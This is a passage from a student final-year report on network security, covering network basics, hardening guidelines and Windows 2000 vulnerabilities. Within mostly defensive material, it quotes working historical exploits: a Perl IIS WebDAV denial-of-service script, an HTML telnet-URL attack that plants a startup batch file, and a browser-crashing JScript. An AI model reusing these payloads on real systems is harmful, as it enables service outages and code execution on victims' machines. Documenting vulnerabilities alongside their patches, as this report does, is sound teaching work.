Faculty of Engineering and Architecture
Department of Electrical and Computer Engineering
Final Year Project report for the 05/06 academic year
Project name: DFNZ 06 Network Security
Project advisor: Dr. Ali Hajj
Team members: Antoine George Akiki, Joseph Melhem Chaoul, Jean Kamal Moukarzel
List of Figures and Tables .... 4
Abstract .... 6
Introduction .... 8
1. A Brief Overview of Networks .... 10
1.1 Network Symbols .... 10
1.2 Network Components .... 11
1.3 Network Structure .... 13
1.4 OSI Model Overview .... 14
1.5 Network Devices .... 16
1.5.1 Hubs .... 16
1.5.2 Switches/bridges .... 17
1.5.3 Routers and layer 3 switches .... 18
2. Network Security Theory .... 19
2.1 Physical Layer Security .... 19
2.2 Hardware Layer Security .... 20
2.3 Application Layer Security .... 21
2.4 Operating System Layer Security .... 24
2.4.1 Windows 2000 Vulnerabilities and Solutions .... 25
2.4.2 Increasing Windows 2000 and XP Security (refer to [7]) .... 29
2.5 Network Layer Security .... 34
2.5.1 TCP/IP – The Language of the Internet (refer to [12]) .... 35
2.5.2 Attacks against IP (refer to [12]) .... 35
2.5.3 IPSEC Policy Architecture (refer to [13]) .... 38
2.6 Internal Network Security .... 39
2.7 Survey of Most Common Threats .... 41
2.7.1 Attacks Automated by Malicious Codes .... 41
2.7.2 Hackers' Attacks (not automated by malicious codes) .... 48
2.7.3 DoS .... 51
2.7.4 Social Engineering .... 59
3. Our Network Design .... 63
3.1 Topology .... 63
3.2 Securing the Perimeter .... 64
3.3 Our Network .... 68
4. Installing the Network .... 69
4.1 Plugging the Network and Creating a Domain .... 70
4.1.1 Setting Up the Linksys Product .... 70
4.1.2 Creating the Domain .... 71
4.2 Tightening Security .... 72
4.2.1 Patches on Windows .... 72
4.2.2 Disabling USB Ports to Protect Against Flash Drives .... 72
4.3 Creating Common and User Files .... 75
4.4 Scanning the Network and Updating Security .... 75
4.4.1 Linux Tools .... 76
4.4.2 Windows Tools .... 76
4.5 Confusing the Hackers: Honey Pots .... 77
4.5.1 What is a Honeypot .... 77
4.5.2 Classifications of Honeypots .... 78
4.5.3 Review of Most Popular Honeypots .... 82
4.5.4 Our Selection and Work .... 91
4.6 User Logs .... 96
5. Countering the Attacks .... 106
5.1 First Attack .... 106
5.2 Second Attack: Physical Attack .... 116
Conclusion .... 118
Reference .... 120
Appendix .... 122
Appendix A .... 122
Appendix B: PortSentry .... 122
Appendix C: Timeline and Budget .... 129
List of Figures and Tables
Figure 1.1: Networking facilitates the access of information (p11)
Figure 1.2: Hierarchical Structure of a Network (p12)
Figure 1.3: OSI layers (p14)
Figure 1.4: Workstations connected with a hub (p16)
Figure 1.5: Devices connected with a switch (p16)
Figure 1.6: Typical connections of a router (p17)
Figure 2.1: A Wider View of Internet-connected Networks (p36)
Figure 3.1: Our Network Design (p41)
Figure 2.1: Classification of malicious code (p43)
Figure 2.3: Main types of viruses (p44)
Figure 2.4: Program File Virus (p46)
Figure 2.5: Logic Bomb (p51)
Figure 2.6: DoS (p52)
Figure 2.7: DDoS Attack (p53)
Figure 2.8: DRDoS (p54)
Figure 2.9: DRDoS Reflection (p55)
Figure 2.10: TCP 3-way handshake (p57)
Figure 2.11: Smurf Attack (p57)
Figure 3.1: Network Topologies (p62)
Figure 3.2: Our Network Design (p67)
Figure 4.1: Back Officer Friendly Detective (p79)
Figure 4.2: BOF screen capture showing spoofed services (p82)
Figure 4.3: BOF warnings (p82)
Figure 4.4: Specter GUI (p85)
Figure 4.5: A possible deployment of Decoy Server (p87)
Figure 4.6: Honeynet Architecture (p89)
Figure 4.7: Server application output format (p101)
Table 1.1: Network Symbols (p10)
Abstract

Network security is a rising issue in all major businesses due to the increase in sophistication and abundance of security breaches over the past decade. This is why Deloitte & Touche, a major international auditing firm, proposed to AUB that a group of graduating computer engineers work on the network security issue as the topic for their Final Year Project. In this sense, preliminary meetings were arranged by Prof. Kayssi (ECE Department Chairperson), and held with Mr. Saad Majari, an AUB graduate now working for Deloitte's IT department, so that we could be introduced to the company and its interests concerning network security.

During these meetings, we agreed that two groups of three students each would work on the topic. The two groups' supervisor would be Prof. Ali el-Hajj, from the ECE department. It was also decided that our group would handle setting up a network and ensuring it is secured in all ways possible. The other group of three would therefore have the task of hacking into our network, from the outside but also from the inside, in order to pinpoint our network's weaknesses. The output of this project would be proper documentation relating all the steps taken to secure the network and to deal with the attacks.

During the first stage of our Final Year Project, we performed an in-depth literature survey in order to get more acquainted with the subject. Reading material was provided to us by Mr. Awad, Mr. Majari and Mr. Brouwer, from Deloitte, in addition to white papers and documents we found on the internet.

The material found relevant to our project is included in this report. Covered topics range from network specification and topology, an overview of past and current security breaches, security strategies for the different network layers, possible attacks, etc.

With this in-depth information, we were able to set up our network in the second stage of our FYP, and secure it by implementing the security strategies. We were given four computers equipped with Pentium 2 processors. We thus installed one Windows 2000 server, one Windows 2000 workstation, one Fedora server and one Fedora workstation.

Finally, the third and final stage of our FYP was the "attacks" stage. The hackers' team attempted to attack our network externally and internally. Full documentation is included in this report.
Introduction

Our Final Year Project (FYP), entitled 'Dfnz06', is a project involving network security and attacks. Throughout the academic year, two teams will challenge each other, one being the security team (our team) and one being the hacking team. The project was proposed and will be supervised by Deloitte, in cooperation with Pr. Ali Hajj from the ECE department.

Security of networks and information systems in general is essential to businesses that need to connect to the internet and keep their data safe. It is also essential within the business, when employees are given specific roles and privileges, which define what part of the information they can read and/or write.

In this sense, it is important for a business to build a well-secured network. In doing so, many factors are to be taken into consideration, as we are tackling a multi-disciplinary field, which nonetheless must be treated as a whole [1].

The task that was assigned to us was to build a small network, just as small and medium size businesses (SMB) would do, and document all the guidelines and steps that were followed to secure this network. In this way, the resulting document could be used as a reference for students and faculty, but also for professionals wanting to learn about the safe measures that should be taken in order to have a protected network.

However, it does not stop here. It is common practice amongst engineers to test every design they do. In the case of our FYP, the testing will be a real-life situation. Another group of students will try to hack into our network, from the outside (by connecting to our firewall), and from the inside (they will be given an account with limited privileges and will try to bypass it). In this way, not only the steps in designing the network will be documented, but also the measures to be taken when a breach of security is identified.

This report gives an account of what has been done in our FYP during the whole 2005/2006 academic year.

It starts by giving a brief overview of networks, as it is essential to fully understand the way a network operates in order to secure it. It then presents what can be regarded as a literature survey: a summary of all the information relevant to network security design that we will be using while building the network. As was stated earlier, many factors should be taken into consideration, such as the physical layer, the hardware layer, the application layer, the operating system layer and the network layer. It is also important to know the enemy when trying to defend a network: therefore, a survey of the most common threats and how they should be dealt with is presented in this report. Moreover, this report presents our design: the network we built and its specifications (documenting the steps taken while building). Finally, the last part of this report is a detailed documentation of the attacks performed by the hackers' team and the ways by which we dealt with such attacks.
1. A Brief Overview of Networks
This section presents a review of internetworking terminology, such as the Open System
Interconnection (OSI) reference model and how the layers in the OSI operate. Moreover,
this section gives a brief overview of the devices that are used to support different
network requirements.
1.1 Network Symbols
The following symbols will be used throughout this report to illustrate various network devices. All graphics are courtesy of Cisco Systems.
Table 1.1: Network Symbols (Router, Firewall, Switch, Workstation, Bridge, Server, Hub)
1.2 Network Components
The primary purpose of Networks is to enable easy access of information regardless of
place, time, and type of computer system [2].
Figure 1.1: Networking facilitates the access of information [2]

As can be seen in the figure above, the big company network is subdivided into the following network components:
• The Main Office: everyone in this office is connected via a LAN (Local Area Network). The company's servers (and hence vital information) are located and connected via this same LAN.
• A Branch Office: information from the main office's server can be accessed remotely (via a multitude of ways: leased line, Virtual Private Network, Internet…). In this way, although physically far, the branch office seems part of the main office's network.
• A Home Office: employees can work from their homes, most likely with on-demand connections to the main office (or even the branch office). In this way, an employee working from home can access information from the company's servers and use the network's resources.
• Mobile Users: these are individuals who connect to the main office's LAN wherever they are (by a multitude of means, most likely an on-demand connection using phone lines).
The fact that the main office's LAN is connected to the internet and to other network components (like the branch office) makes it important to have a secure design. In this way, vital information will not fall into the wrong hands and the company's privacy will be preserved.
1.3 Network Structure
In general, and in almost every enterprise, networks are structured in a hierarchical way:

Figure 1.2: Hierarchical Structure of a Network (Access Layer, Distribution Layer, Core Layer)

The access layer of the network, also referred to as the desktop layer, is the point at which end users are connected to the LAN. In other words, the access layer is any end-station's entry point to the network. Sometimes, end users are placed in groups according to which resources they need to access the most. Most of the time, when a user needs to use the printer, access a server or use the internet, his traffic is directed to the distribution layer.
The distribution layer, also referred to as the workgroup layer, is the link between the access layer (hence the users) and the "motorway" [2] of the network, i.e. the core. The main function of the distribution layer is to perform vital packet manipulation such as:
• Routing,
• Filtering,
• WAN access…
In brief, the distribution layer can be regarded as the policy controller: it determines if and how packets can access the core. It also determines the fastest way for a user to access the servers. In any case, once the layer in question decides on the path, it forwards the request to the core layer.
The main purpose of the core layer, also referred to as the backbone, is to switch traffic as fast as possible. It also provides quick transport to what are called enterprise services: e-mail, videoconferencing and, most importantly, Internet.
1.4 OSI Model Overview
The OSI model is the conceptual framework of how networks are built and operate. As the figure below illustrates, the OSI model has seven layers:

Figure 1.3: OSI layers [2]

The four lower layers define ways for end stations to connect to each other in order to exchange data. The three upper layers define the way applications (within the end stations) communicate with each other and with the users. In more detail, the roles of each layer are:
• Application layer: the layer at which the user interacts with the computer. Protocols at this layer determine available resources, define communication partners and synchronize all communication.
• Presentation layer: ensures that information sent by the application layer of one end station will be readable by the application layer of another end station operating on another system. This is done by encryption, for example.
• Session layer: establishes, manages and terminates communication sessions between presentation layers.
• Transport layer: this layer distinguishes between upper layer applications, and establishes end-to-end connectivity between them. It also defines flow control and provides reliable or unreliable services for data transfers.
• Network layer: this layer defines the logical source and destination addresses associated with a specific protocol. It also defines the different paths that exist through the network and interconnects multiple data links. Note that routers and layer 3 switches operate at this layer.
• Data-Link layer: this layer defines the physical source and destination addresses and the network topology. It also supports frame sequencing and flow control. Note that switches operate at this layer.
• Physical layer: this layer is the most basic of all; it defines the media type, connector type and signaling type. In other words, this layer specifies the electrical, mechanical, procedural and functional requirements for activating, de-activating and maintaining the physical link between end systems. Note that hubs and bridges operate at this layer.
1.5 Network Devices
1.5.1 Hubs
Hubs operate at the physical layer. This implies that all devices are in the same broadcast domain and the same collision domain. The devices also share bandwidth. In other words, devices connected to a hub communicate with each other as if they were on the same segment. The hub connecting them does not manipulate or view the traffic exchanged.
Figure 1.4: Workstations connected with a hub
1.5.2 Switches/bridges
Layer 2 switches (i.e. switches) or bridges operate at the data-link layer. Each segment connected to a port in the switch has its own collision domain, but all segments are in the same broadcast domain.
The switch hears every frame that crosses a segment and determines whether it has to copy it to another segment by looking at the destination address and checking its MAC table.
Figure 1.5: devices connected with a switch
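The learning and forwarding behaviour described in 1.5.1 and 1.5.2, as an added example that is not part of the original report: a short Python simulation of a hub and of a learning switch. The MAC addresses, port numbers and frames are constructed for the illustration.

```python
"""Layer 2 forwarding as described in section 1.5.2, next to a hub for comparison.

Added example, not part of the original report. A LearningSwitch records the
port on which it heard each source MAC address, then forwards a frame only to
the port where the destination was learned; unknown destinations and the
broadcast address are copied to every other port, which is why a switch still
forms a single broadcast domain while splitting the collision domain per port.
A Hub repeats every frame to every other port unconditionally (section 1.5.1).
Addresses and port numbers below are constructed for the illustration.
"""
BROADCAST = "ff:ff:ff:ff:ff:ff"


class Hub:
    """Physical-layer repeater: every port shares one collision domain."""

    def __init__(self, ports):
        self.ports = list(ports)

    def receive(self, in_port, src, dst):
        """Return the ports the frame is repeated to (all except the one it came in on)."""
        return [p for p in self.ports if p != in_port]


class LearningSwitch:
    """Data-link-layer switch with a MAC table keyed by source address."""

    def __init__(self, ports):
        self.ports = list(ports)
        self.mac_table = {}   # MAC address -> port on which it was last heard

    def receive(self, in_port, src, dst):
        """Handle one frame heard on in_port; return the list of ports it is copied to."""
        self.mac_table[src] = in_port                 # learn where src lives
        if dst == BROADCAST or dst not in self.mac_table:
            return [p for p in self.ports if p != in_port]   # flood
        out_port = self.mac_table[dst]
        if out_port == in_port:
            return []       # destination is on the same segment: no copy needed
        return [out_port]


def forwarding_trace(device, frames):
    """Run (in_port, src, dst) frames through a device; return the port list chosen for each."""
    return [device.receive(in_port, src, dst) for in_port, src, dst in frames]


# Constructed scenario: three segments, stations A (port 1), B (port 2), C (port 3).
SAMPLE_FRAMES = [
    (1, "00:00:00:00:00:0a", "00:00:00:00:00:0b"),  # A -> B, B still unknown: flooded
    (2, "00:00:00:00:00:0b", "00:00:00:00:00:0a"),  # B -> A, A known: port 1 only
    (1, "00:00:00:00:00:0a", "00:00:00:00:00:0b"),  # A -> B, B now known: port 2 only
    (3, "00:00:00:00:00:0c", BROADCAST),             # C broadcast: every other port
]

if __name__ == "__main__":
    for name, dev in (("hub", Hub([1, 2, 3])), ("switch", LearningSwitch([1, 2, 3]))):
        print(name, forwarding_trace(dev, SAMPLE_FRAMES))
```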
1.5.3 Routers and layer 3 switches
Routers and layer 3 switches operate at the network layer. They can control broadcasts and multicasts, they determine the optimal path a frame should take, and they manage traffic. Usually, routers are the network's doorway to the internet or to a bigger WAN.
Figure 1.6: Typical connections of a router (to the Internet and to another LAN)
2. Network Security Theory
Now that we have a brief, but precise and clear, understanding of how a network operates, it is time to tackle the security aspect. How is a network secured from the outside and from within? What are the different fields that come into play? All those questions were answered by our research. Although we have come across a lot of readings, we hereby present the information we judged to be the most essential and relevant to our project.
Security is multi-dimensional: it spans different layers. Throughout this section we will discuss the security of the physical, hardware, application, operating system and network layers. Moreover, this section will give the principal rules and guidelines to secure a network from the inside.
2.1 Physical Layer Security
Physical security is often viewed as the first line of defense of a system [1]. It prevents an intruder from accessing the system physically (sitting down and accessing information on an already logged-in computer).
Applying physical layer security to our FYP gives us the following guidelines:
• A person of our team should always be present whenever a computer is logged in. Logged-in computers should never be left unattended.
• If possible, access to the room where our network is located (Khaled JouJou's lab) should be controlled and banned to those who do not have business there. Moreover, the switch and firewall should not be accessible to members outside the team. If this is not possible, users should be restricted to logging in only on certain systems, whether they are identified by MAC addresses (see further sections) or by a hostname. Security can also be enhanced by allowing them access only during certain times, for example.
• The team should adopt a clear desk policy: vital documents should be stored on CDs or USB keys, and should not be left unattended (lock them in drawers, take them home…).
• A proper inventory of all the equipment we have should be done, and no device or machine should be unplugged and taken away without a reason.
• Our network should be protected against power failures and climate hazards (this should not be a problem in Mr. Joujou's labs).
On a larger enterprise scale, other measures can be taken to increase the physical security of the system: biometrics can be used for ID purposes, visitors should not be left unattended, and server rooms should be equipped with appropriate monitoring devices (cameras, for example), guarded by appropriately trained personnel, or secured with key-card access doors.
2.2 Hardware Layer Security
There are two aspects of hardware security: the first consists of security at the hardware level in CPUs, and the second consists of hardware security at the level of the enterprise and the users [1]. An example of a security issue at the CPU level is interrupt handling. The interrupt vector table is a target for hackers that are able to exploit the system's vulnerabilities at the lower level.
As for hardware security at the level of the enterprise, the following guidelines should be implemented in our FYP:
• Access to a server's or a workstation's BIOS should be protected by a password (which only the administrator knows). In this way, a user will not be able to take control of the machine, in addition to accessing data that he would otherwise not be able to retrieve (given his privileges).
• Appropriate BIOS configuration should be done to limit the drive boot sequence to the OS drive. A user should not be able to boot from other drives such as floppies or CDs. Also, by forcing the workstation to boot only from the OS drive, installation of software or new operating systems will be denied.
• Configurations of routers and/or switches should be password protected.
On a larger enterprise scale, it is also important to protect access to printers by a password. Otherwise, a hacker can change a printer's configuration and reroute printer outputs to other destinations (theft of information).
2.3 Application Layer Security
Application layer security is very important since it involves the entry of data [1]. The application layer consists mainly of software and database development. The threats at this layer are: buffer overflows, backdoors, incompleteness of data and viruses. There are specific guidelines we will be following to achieve security at this layer.
• Users should be limited to having only one active session with the applications and the network. In this way, accountability of users is enhanced.
• Users should have identifiable usernames that follow the same pattern for all (ex: the AUB usernames are composed of the users' initials). Logs should be entered in a database, and queries can be used to retrieve specific information.
• A list of unauthorized software should be established, to prevent users from installing any undesired, dangerous software (it is recommended to ban users from installing any software).
• Highly sensitive data should be encrypted before being stored. In this way, reading or writing such data is more difficult.
• Any software upgrade should be installed in time. However, it is recommended to test these upgrades and look for any patches that could enhance security.
• Initial passwords should be given to users after being generated in a random way.
• Some password conditions should be set: passwords should not be the same as the username, or the user's department, for example. They should be at least 6 (or 8 in sensitive cases) characters long, and include combinations of letters and numbers. In this way, guessing passwords is almost impossible and cracking them is a lengthy process for hackers.
• If a user tries to access his account with no result (the password entered is incorrect), his account should be blocked after 3 trials. Only the administrator should have the power to unblock the account.
• When the administrator changes the privileges of a user (after a promotion or a demotion, for example), the user should automatically be logged off and asked to log in again. Moreover, if a user account is deleted, the user should also be logged off (to prevent this user from doing unnecessary and dangerous operations when, in fact, he is not allowed to). In this way, user accountability and responsibility are enforced.
• The user profile should be complete and informative. In a company, for example, it should include the department of the user, his ranking, etc. To force the user to fill in vital information in his profile, some fields should be made obligatory. In this way, if ever the user's information is needed, it will be complete and clear, and accountability is thus enforced.
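The password and lockout rules listed above, as an added example that is not part of the original report. The thresholds are the report's own (6 or 8 characters, letters and digits, not equal to the username or department, 3 failed attempts, administrator-only unlock); the Account and AccountStore names, the salted PBKDF2 storage and the sample users are assumptions made for this illustration.

```python
"""Password policy and account lockout rules from the section 2.3 guidelines.

Added example, not part of the original report. It encodes the thresholds the
report states (at least 6 characters, 8 for sensitive accounts; letters and
digits; not equal to the username or department; lockout after 3 failed
attempts; unlock by an administrator only). The Account and AccountStore
names, the salted PBKDF2 storage and the sample users are assumptions made
for this illustration.
"""
import hashlib
import hmac
import secrets
import string
from dataclasses import dataclass

MIN_LENGTH = 6                # report: at least 6 characters
MIN_LENGTH_SENSITIVE = 8      # report: 8 in sensitive cases
MAX_FAILED_ATTEMPTS = 3       # report: block the account after 3 trials


def check_password_policy(password, username, department, sensitive=False):
    """Return the list of violated rules; an empty list means the password is acceptable."""
    min_len = MIN_LENGTH_SENSITIVE if sensitive else MIN_LENGTH
    problems = []
    if len(password) < min_len:
        problems.append(f"shorter than {min_len} characters")
    if password.lower() == username.lower():
        problems.append("equal to the username")
    if password.lower() == department.lower():
        problems.append("equal to the department")
    if not any(c.isalpha() for c in password):
        problems.append("contains no letters")
    if not any(c.isdigit() for c in password):
        problems.append("contains no digits")
    return problems


def generate_initial_password(length=MIN_LENGTH_SENSITIVE):
    """Random initial password (report: initial passwords are generated randomly).

    Draws from letters and digits until the letters-and-digits rule is met."""
    if length < MIN_LENGTH_SENSITIVE:
        raise ValueError("initial passwords are generated at the sensitive length")
    alphabet = string.ascii_letters + string.digits
    while True:
        candidate = "".join(secrets.choice(alphabet) for _ in range(length))
        if not check_password_policy(candidate, "", "", sensitive=True):
            return candidate


def _hash(password, salt):
    """Salted PBKDF2 digest; the store never keeps the password itself (assumption)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


@dataclass
class Account:
    username: str
    salt: bytes
    digest: bytes
    failed_attempts: int = 0
    locked: bool = False


class AccountStore:
    def __init__(self):
        self.accounts = {}

    def add(self, username, password, department, sensitive=False):
        """Create an account; the password must pass the policy first."""
        problems = check_password_policy(password, username, department, sensitive)
        if problems:
            raise ValueError("password rejected: " + ", ".join(problems))
        salt = secrets.token_bytes(16)
        self.accounts[username] = Account(username, salt, _hash(password, salt))

    def login(self, username, password):
        """Return 'ok', 'locked' or 'denied'; the third wrong password locks the account."""
        acct = self.accounts.get(username)
        if acct is None:
            return "denied"        # same answer as a wrong password: do not reveal usernames
        if acct.locked:
            return "locked"
        if hmac.compare_digest(acct.digest, _hash(password, acct.salt)):
            acct.failed_attempts = 0
            return "ok"
        acct.failed_attempts += 1
        if acct.failed_attempts >= MAX_FAILED_ATTEMPTS:
            acct.locked = True
            return "locked"
        return "denied"

    def unlock(self, requester_role, username):
        """Only the administrator may unblock an account; returns True on success."""
        if requester_role != "administrator" or username not in self.accounts:
            return False
        acct = self.accounts[username]
        acct.locked = False
        acct.failed_attempts = 0
        return True
```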
The biggest threat resulting from many applications is their vulnerability to "buffer overflow" attacks, which usually result in the hacker having access to the system with the rights of whatever user account the application was running under.
The following are some general guidelines related to applications:
• More secure equivalents of insecure applications should be used (ex: ssh instead of telnet, since telnet is inherently insecure due to the fact that passwords are transmitted over the wire as clear text).
• Applications should be kept up-to-date with the latest versions. Many releases are specifically developed to address security issues.
• Ports that an application opens should be determined and closed if they are not absolutely necessary.
• The application vendor's Web site should regularly be checked for information on how to make the application more secure and for any news items or patches that address newly-discovered security vulnerabilities.
• In the case of a Web server, proper programming techniques can ensure that CGI scripts are secure.
• Also in the case of a Web server, if Web page updates are fairly infrequent, a floppy disk may be used to "sneaker-net" the updated HTML files by logging into the console as root, mounting the floppy disk, copying the files into the DocumentRoot directory, and then unmounting the floppy. Doing so would eliminate the need to run an ftp server service and to enable an account for the person who maintains the pages.
2.4 Operating System Layer Security
As will be seen in the next section of this report, the computers we were provided with have Pentium 2 processors. We therefore decided to install Windows 2000 on them, since Windows XP would be too slow, as well as Fedora. This section aims to present the vulnerabilities and protection schemes for the Windows 2000 operating system and Linux.
Hardening the operating system involves many things that are not only operating-system-specific, but may often vary from one "flavor" of an operating system to another. Typical steps, whatever the OS, include:
• Disabling all default accounts and groups that are not needed. When an operating system is installed, it sets up quite a few user accounts and groups by default (like the guest account, or other application accounts).
• The startup configuration can be changed so that only necessary services are running. Many services open TCP/IP "ports" which hackers find when running port scans against systems. Thus, closing all unnecessary ports by disabling unnecessary services or applications is a common practice.
• Server consoles that are not being used should be logged off. This is of particular importance for Internet-connected systems.
2.4.1 Windows 2000 Vulnerabilities and Solutions
Microsoft IIS 5.0 WebDAV 'Search' Denial of Service is a vulnerability that was published on March 16, 2001. WebDAV contains a flaw in the handling of unusually long requests: submitting a valid yet unusually long WebDAV 'search' request could restart the IIS services and possibly cause the server to stop responding. The following exploit has been provided by Georgi Guninski [4]:
#!/usr/bin/perl
use IO::Socket;
print "IIS 5.0 SEARCH\n wait some time\n";
if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; }
$port = @ARGV[1];
$host = @ARGV[0];
sub vv() {
  $ll=$_[0]; #length of buffer
  $ch=$_[1];
  $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
  $over=$ch x $ll; #string to overflow
  $xml='<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE("'.$over.'")</D:sql></D:searchrequest>'."\n";
  $l=length($xml);
  $req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
  syswrite($socket,$req,length($req));
  print ".";
  $socket->read($res,3000);
  print "r=".$res;
  close $socket;
}
do vv(126000,"V");
sleep(1);
do vv(126000,"V");
#Try 125000 – 128000
Solution:
Microsoft patch Q291845_W2K_SP2_x86_en
http://download.microsoft.com/download/win2000platform/Patch/q291845/NT5/EN-US/Q291845_W2K_SP2_x86_en.EXE
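A defensive counterpart to the exploit quoted above, added here and not part of the original report or of Georgi Guninski's code: a request-size check that a filter in front of the server, or a script reviewing captured requests, could apply to WebDAV SEARCH requests. The size limits and the sample requests are assumptions constructed for this example.

```python
"""Size check for WebDAV SEARCH requests, following the IIS 5.0 issue in section 2.4.1.

Added example, not part of the original report or of the quoted exploit. The
exploit's request carries a SCOPE("...") argument of roughly 126,000
characters. A filter in front of the server, or a script reviewing captured
requests, can refuse a SEARCH whose declared Content-Length, actual body or
SCOPE argument exceeds a limit that legitimate DAV queries never reach. The
limits and the sample requests are assumptions constructed for this example.
"""
import re

MAX_SEARCH_BODY = 8192       # assumed ceiling for a legitimate DAV SEARCH body, in bytes
MAX_SCOPE_LENGTH = 1024      # assumed ceiling for one SCOPE("...") argument, in characters
SCOPE_RE = re.compile(r'SCOPE\("([^"]*)"\)', re.IGNORECASE)


def parse_request(raw):
    """Split a raw HTTP request (bytes) into (method, target, headers, body).

    Accepts both CRLF and bare LF line endings, since the quoted exploit uses LF only."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        head, _, body = raw.partition(b"\n\n")
    lines = head.decode("latin-1").splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def check_search_request(raw):
    """Return None if the request is acceptable, otherwise a short reason to reject it."""
    method, _target, headers, body = parse_request(raw)
    if method.upper() != "SEARCH":
        return None                      # only the SEARCH method is subject to this check
    try:
        declared = int(headers.get("content-length", "0"))
    except ValueError:
        return "non-numeric Content-Length"
    largest = max(declared, len(body))
    if largest > MAX_SEARCH_BODY:
        return f"SEARCH body too large ({largest} bytes)"
    for scope in SCOPE_RE.findall(body.decode("latin-1")):
        if len(scope) > MAX_SCOPE_LENGTH:
            return f"SCOPE argument too long ({len(scope)} characters)"
    return None


def build_search_request(scope, host="host"):
    """Constructed sample: a SEARCH request in the same layout as the quoted exploit."""
    xml = ('<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>'
           'SELECT DAV:displayname from SCOPE("' + scope + '")</D:sql></D:searchrequest>\n')
    return (f"SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: {host}\n"
            f"Content-length: {len(xml)}\n\n{xml}\n\n").encode("latin-1")


if __name__ == "__main__":
    for label, scope in (("normal", "/docs"), ("oversized", "V" * 126000)):
        print(label, check_search_request(build_search_request(scope)))
```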
Microsoft IE 5.01/ 5.5 Telnet Client File Overwrite is a vulnerability that was
published on March 09, 2001. Services for Unix 2.0 contains a client side logging
option which records all information exchanged in a telnet session. A
vulnerability exists that could enable a remote user to invoke the telnet client and
execute arbitrary commands on a target machine via IE. This is achieved by
crafting a URL composed of command line parameters to the telnet client, which
would invoke 'telnet.exe'. Telnet would connect to the host and initiate the
logging of session information; access to this log file allows an attacker to write
arbitrary commands into it, which may be executed later.
The following exploit has been provided by Oliver Friedrichs [4]:
telnet:-f%20\file.txt%20host
The following is an example of a malicious HTML message which could cause data that is received
from the destination port on the host "host" to be written to the file "filename" in the startup directory
for all users. If the logged in user has the appropriate permissions, a batch file will be created and
executed upon future authentication.
<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\Documents%20and%20Settings\All%20Users\start%20menu\programs\startup\start.bat%20host%208000>
</frameset>
</html>
Solution:
Microsoft has released a patch which rectifies this issue:
http://www.microsoft.com/windows/ie/download/critical/q286043/default.asp
Microsoft Outlook vcard Buffer Overflow is a vulnerability that was published on
February 22, 2001. Due to an unchecked buffer in Microsoft Outlook, it is
possible for a remote user to execute arbitrary code on a victim's machine. If a
maliciously crafted .vcf file containing malformed data in the 'Birthday' field is
sent as an attachment and executed, the maliciously embedded code could be run
on the recipient's machine. An exploit has been provided by Ollie Whitehouse [5].
A solution is also provided by a Windows patch:
http://www.microsoft.com/windows/ie/download/critical/q283908/default.asp
Windows 2000 EFS Temporary File Retrieval Vulnerability was published on
January 19, 2001. EFS is the encrypted file system package designed to secure
sensitive information. It is included with the Windows 2000 Operating System,
distributed and maintained by Microsoft Corporation. A problem in the package
could allow the recovery of sensitive data encrypted by the EFS. When a file is
selected for encryption, a backup copy of the file is moved into the temporary
directory using the file name efs0.tmp. The data from this file is taken and
encrypted using EFS, with the backup file being deleted after the encryption
process is performed. However, after the file is encrypted and the backup is deleted,
the blocks in the file system are never cleared, thus making it possible for any
user on the local host to access the data of the encrypted file, which falls outside
of the constraints of access control imposed by the Operating System. This makes
it possible for a malicious user to recover sensitive data encrypted by EFS.
Microsoft WINS Domain Controller Spoofing Vulnerability was published on
January 17, 2001. Windows Internet Naming Service (WINS) ships with
Microsoft Windows NT Server. WINS resolves network computer names to IP
addresses in a client-server environment. A distributed database is
updated with an IP address for every machine available on the network.
Unfortunately WINS does not properly verify the registration of domain
controllers. It is possible for a user to modify the entries for a domain controller,
causing the WINS service to redirect requests for the DC to another system. This
can lead to a loss of network functionality for the domain. The DC impersonator
can also be set up to capture username and password hashes passed to it during
login attempts. An exploit has been provided by David Byrne [6], and a
workaround by Paul Schmehl [4].
Microsoft MSHTML.DLL Crash Vulnerability was published on January 15,
2001. MSHTML.DLL is the shared library for parsing HTML in Internet Explorer
and related applications. It may be possible for an attacker to crash this library
remotely and cause a denial of service with special JScript code. This bug involves
JScript's ability to handle multiple window objects. If a window object is deleted
after it receives data and then re-initialized, the library will reportedly crash. This
behavior has been attributed to a stack overflow by its discoverer. It is reportedly
not exploitable in any way that may permit an attacker to gain access to the victim
host. The following exploit has been provided by Thor Larholm:
<iframe id=test style="display:none"></iframe>
<script>
Larholm = {}; // Object literal
test.document.open(); // Stream data
test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
delete Larholm;
Larholm = {}; // Crash
</script>
2.4.2 Increasing Windows 2000 and XP security (refer to [7])
Editing the registry and disabling services can lead to problems. We must back up
before we change any setting and change only one setting at a time.
- Registry settings are edited with a program called regedt32. Click on the Start Menu >
Run > type regedt32.
- Services are turned on and off with services.msc. Click on the Start Menu > Run > type
services.msc.
Null sessions allow unwanted users to gain access to our computers; they are
opened on NetBIOS ports 139 and 445. NetBIOS is Windows' default protocol for "File and
Print Sharing." With automated tools, hackers will gain access to crucial system
information such as accounts and passwords. NULL sessions are a built-in
communication share using an anonymous user and a NULL password on the NetBIOS
port. The easiest way to stop NULL sessions is by disabling "File and Print Sharing" on
all network devices. In order to do so on Windows 2000 go to Control Panel > Network
and Dial-up Connections and select the proper connection.
If these services are required then we will make a registry entry that stops sensitive
data from being sent through the NetBIOS port:
- Open regedt32 from the Run menu.
- Select HKEY_LOCAL_MACHINE > System > CurrentControlSet > Control >
LSA.
- The key we want to edit is RestrictAnonymous.
- We will change the value to 1 or 2. A setting of 1 indicates that null
connections are allowed but sensitive data is blocked from being sent via the
connection (the only option available in NT4). A setting of 2 will disallow any NULL
connections; this may conflict with some 3rd party software. There are a few
hacking tools that will work on a level 1 setting and retrieve information. Reboot
the machine when done.
Another way to prevent access to port 139 is to disable NetBIOS over TCP/IP.
Windows will cascade to port 445 to respond to NULL sessions and other
